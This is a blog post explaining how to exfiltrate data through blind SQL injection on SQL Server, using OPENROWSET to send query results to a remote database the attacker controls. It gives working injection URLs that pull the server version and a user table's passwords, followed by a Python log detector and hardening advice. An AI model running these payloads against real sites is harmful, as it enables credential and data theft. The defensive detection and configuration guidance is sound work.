Tuesday, February 14, 2017

Blind SQLi, Data exfiltration

When sqlmap fails

It is generally a very slow process to exfiltrate data through a blind SQL injection. What is worse is that sqlmap sometimes fails on you in one of those cases and is unable to retrieve the data. *sad face*

However, in some special cases there might be an easier way to exfiltrate data from the database. One of those cases is when the database server itself is able to connect out to the internet on some port. Let us take an example and see how it can be done.

For example, let us assume we found an SQL injection in the parameter 'p0' on a website, randomsite.vom?p0=canary. Let us also suppose the database can connect out to the internet on port 443. We will call this database the 'Vulnerable Database'.

Now what we can do is set up a remote database on another machine over the internet and run its service on port 443 instead of the default port. Then we can use 'openrowset' to exfiltrate data from the vulnerable DB to the remote DB. I will jump right into the juicy part; in case anyone is interested to know more about 'openrowset' and how it works, there are links in the references. Long story short, it is a feature intended for ad hoc distributed queries and DB replication.

Now the generic attack payload would look like this:

randomsite.vom?p0=canary';insert into openrowset (connection details, query remote db) values (query to be run on vulnerable server)--

Now, suppose you want to find out the version of the vulnerable database. Then you can change it to:

randomsite.vom?p0=canary';insert into openrowset ('SQLOLEDB', 'DRIVER={SQL Server};SERVER=192.168.43.0,443;UID=sa;PWD=pass','select * from foo') values (@@version)--

Here, foo is a table in the remote DB. The table foo must have exactly the same number of columns as the query run on the vulnerable DB returns. Here foo has only one column, because the output also has one column. If you want to avoid that constraint, you can concatenate everything into a single column.

Example: assume the vulnerable DB has a table named 'user' which has the columns 'id' and 'pass'. (Note that in SQL Server an INSERT that takes its rows from a SELECT does not use the VALUES keyword.)

randomsite.vom?p0=canary';insert into openrowset ('SQLOLEDB', 'DRIVER={SQL Server};SERVER=192.168.43.0,443;UID=sa;PWD=pass','select * from foo') select concat(id,0x3a,pass) from user--

Assumptions made in the above method:
  • Blind SQL injection (in other cases this might be just overkill)
  • The database server can connect out over the internet.
  • SQL Server is assumed. Similar attacks might work on other vendors such as MySQL.
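From the defender's side, the technique above leaves a distinctive trace in the web server access log: a stacked query containing OPENROWSET (or OPENDATASOURCE) together with an embedded OLE DB connection string pointing at an external server,port pair. The following detector is an added example written for this post, not code from the original author; it assumes Apache/Nginx combined-format access log lines, the three sample lines are constructed (the 203.0.113.10 address is a documentation address, not a real host), and the indicator list is a heuristic that a real deployment would tune.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format, not from a real server).
# Line 2 carries a URL-encoded stacked query of the kind described in the post.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Feb/2017:10:01:02 +0000] "GET /?p0=canary HTTP/1.1" 200 512
10.0.0.9 - - [14/Feb/2017:10:01:07 +0000] "GET /?p0=canary%27%3Binsert+into+openrowset%28%27SQLOLEDB%27%2C%27DRIVER%3D%7BSQL+Server%7D%3BSERVER%3D203.0.113.10%2C443%3BUID%3Dsa%3BPWD%3Dpass%27%2C%27select+*+from+foo%27%29+values+%28%40%40version%29-- HTTP/1.1" 500 0
10.0.0.7 - - [14/Feb/2017:10:02:30 +0000] "GET /search?q=open+row+set+docs HTTP/1.1" 200 2048
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Indicators of an out-of-band distributed-query attempt. Names are our own labels.
INDICATORS = [
    ("openrowset", re.compile(r"\bopenrowset\s*\(", re.I)),
    ("opendatasource", re.compile(r"\bopendatasource\s*\(", re.I)),
    # OLE DB style connection string with an explicit host,port (e.g. SERVER=host,443;)
    ("remote_connstr", re.compile(r"server\s*=\s*[\w.\-]+\s*,\s*\d{1,5}\s*;", re.I)),
    # A second statement stacked after the injected quote/semicolon.
    ("stacked_query", re.compile(r";\s*(insert|exec|select)\b", re.I)),
]


def decode_request(path):
    """URL-decode repeatedly (up to 3 rounds) so double-encoded payloads are seen."""
    prev, cur = None, path
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote_plus(cur)
    return cur


def scan_line(line):
    """Return the list of indicator names hit by one log line, or None if it
    is not a parseable request line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded = decode_request(m.group(1))
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def scan_log(text):
    """Return [(line_number, [indicators...]), ...] for lines with at least one hit."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings.append((n, hits))
    return findings


if __name__ == "__main__":
    for n, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(hits)}")
```

A single 'openrowset' hit in a search box is noise; a line that hits 'openrowset' together with 'remote_connstr' and 'stacked_query' is the pattern worth paging on. The more durable fix is on the database side: OPENROWSET and OPENDATASOURCE with an inline connection string only work while the SQL Server option 'Ad Hoc Distributed Queries' is enabled (it is off by default and set via sp_configure), and none of this works at all if the database host is not allowed to open outbound connections to the internet, which is exactly the assumption the method relies on.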


Credits: V Razdan

References:
  • http://securityhorror.blogspot.in/2012/03/mssql-injection-openrowset-side-channel.html
  • https://msdn.microsoft.com/en-us/library/ms190312.aspx
